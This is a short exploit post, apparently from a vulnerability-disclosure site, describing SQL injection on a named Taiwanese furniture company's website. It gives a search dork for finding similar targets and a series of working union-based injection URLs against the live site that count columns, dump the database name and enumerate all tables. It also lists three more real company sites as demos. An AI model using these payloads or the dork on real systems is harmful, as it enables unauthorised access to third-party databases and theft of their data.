CHUENG SHINE CO SQl Injection Vulnerability

2019.06.10
dz B14ck_Dz (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:"product.php?id="

# Title : SQL INJECTION Vulnerability # Author : B14ck_Dz { N00b *-* } # Tested On : Backbox (Linux) # Dork : inurl:"product.php?id=" [+] Vulnerable URL : http://www.cschair.com.tw/products.php?TypeID=[id]&CateID=&ID=[id] Let Us Try on This Vulnerable URL ===> [*] E.X : http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=48 [!] Number of Columns : 16 ===> ( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=48 order by 16 ) [!] Vulenrable Record : (9,10,11) ===> ( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=-48 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ) [!] Dumping Database Name : ===> ( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=-48 union select 1,2,3,4,5,6,7,8,CONCAT_WS(0x203a20,DATABASE()),10,11,12,13,14,15,16 ) [!] Dumping All the Tables in the DATABASE Using {HACKBAR} : ( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=-48 union select 1,2,3,4,5,6,7,8,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),10,11,12,13,14,15,16 ) [+] Demo : [*] http://www.cschair.com.tw/productsinfo.php?TypeID=5&CateID=&ID=93 [*] http://www.ampak.com.tw/product.php?id=21 [*] http://www.microtek.com/products.php?KindID=6&ID=1


See this note in RAW Version
Vote for this issue:
50%
50%

Comment it here.
dj3bb4ran0n | Date: 2019-06-10 10:01 CET+1
ferkt 3la vulnerable scripts example {designed by ...} m dirch dork 3nya ou thoto m3andha hata m3na asln mn3rf 3lah 9blo al admin
walid | Date: 2019-06-11 17:33 CET+1
warning: it's bkz here
Copyright 2025, cxsecurity.com

 

Back to Top